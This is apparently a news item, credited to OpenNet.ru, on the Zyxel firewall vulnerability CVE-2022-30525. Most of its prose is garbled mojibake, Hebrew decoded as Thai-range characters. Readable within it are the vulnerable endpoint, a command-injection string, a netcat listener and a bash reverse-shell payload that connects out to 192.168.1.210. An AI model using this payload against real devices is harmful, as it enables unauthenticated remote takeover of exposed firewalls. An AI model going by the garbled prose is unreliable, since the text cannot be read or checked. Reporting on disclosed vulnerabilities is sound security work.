ืืืืชื ืคืืืขืืช ืงืจืืืืช (CVE-2022-30525) ืืืืฉืืจื Zyxel ืืกืืจืช ATP, VPN ื-USG FLEX, ืฉื ืืขืื ืืืจืื ืืช ืคืขืืืช ืืืืืช ืืืฉ, IDS ื-VPN ืืืจืืื ืื, ืื ืฉืืืคืฉืจ ืืชืืงืฃ ืืืฆืื ื ืืืฆืข ืงืื ืขื ืืืฉืืจ ืืื ืืืืืืช ืืฉืชืืฉ ืืื ืืืืืช. ืืื ืืืฆืข ืชืงืืคื, ืชืืงืฃ ืืืื ืืืืืช ืืกืืื ืืฉืืื ืืงืฉืืช ืืืืฉืืจ ืืืืฆืขืืช ืคืจืืืืงืื HTTP/HTTPS. Zyxel ืชืืงื ื ืืช ืืคืืืขืืช ืืขืืืื ืืงืืฉืื ืฉื ZLD 5.30. ืืคื ืฉืืจืืช Shodan, ืืฉื ื ืืืื 16213 ืืืฉืืจืื ืฉืขืืืืื ืืืืืช ืคืืืขืื ืืจืฉืช ืืืืืืืืช ืฉืืงืืืื ืืงืฉืืช ืืืืฆืขืืช HTTP/HTTPS.
ืืคืขืืื ืืชืืฆืขืช ืขื ืืื ืฉืืืืช ืคืงืืืืช ืฉืชืืื ื ื ืืืืืื ืืืืคื ืืืื ืืจื ื /ztp/cgi-bin/handler, ื ืืืฉืืช ืืื ืืืืืช. ืืืขืื ื ืืจืืช ืืืืขืืจ ื ืืงืื ื ืืื ืฉื ืคืจืืืจื ืืงืฉื ืืขืช ืืืฆืืข ืคืงืืืืช ืืืขืจืืช ืืืืฆืขืืช ืืงืจืืื os.system ืืืฉืืฉืช ืืกืคืจืืืช lib_wan_settings.py ืืืืืฆืขืช ืืขืช ืขืืืื ืคืขืืืช setWanPortSt.
ืืืืืื, ืชืืงืฃ ืืืื ืืืขืืืจ ืืช ืืืืจืืืช "; ping 192.168.1.210;" ืื ืฉืืืืื ืืืืฆืืข ืืคืงืืื "ping 192.168.1.210" ืืืขืจืืช. ืืื ืืงืื ืืืฉื ืืืขืืคืช ืืคืงืืื, ืืชื ืืืื ืืืคืขืื ืืช "nc -lvnp 1270" ืืืขืจืืช ืฉืื, ืืืืืจ ืืื ืืืืื ืืืืืจ ืืคืื ืขื ืืื ืฉืืืืช ืืงืฉื ืืืืฉืืจ ืขื ื-'; bash -c \ยปexec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\ยป;'.
ืืงืืจ: OpenNet.ru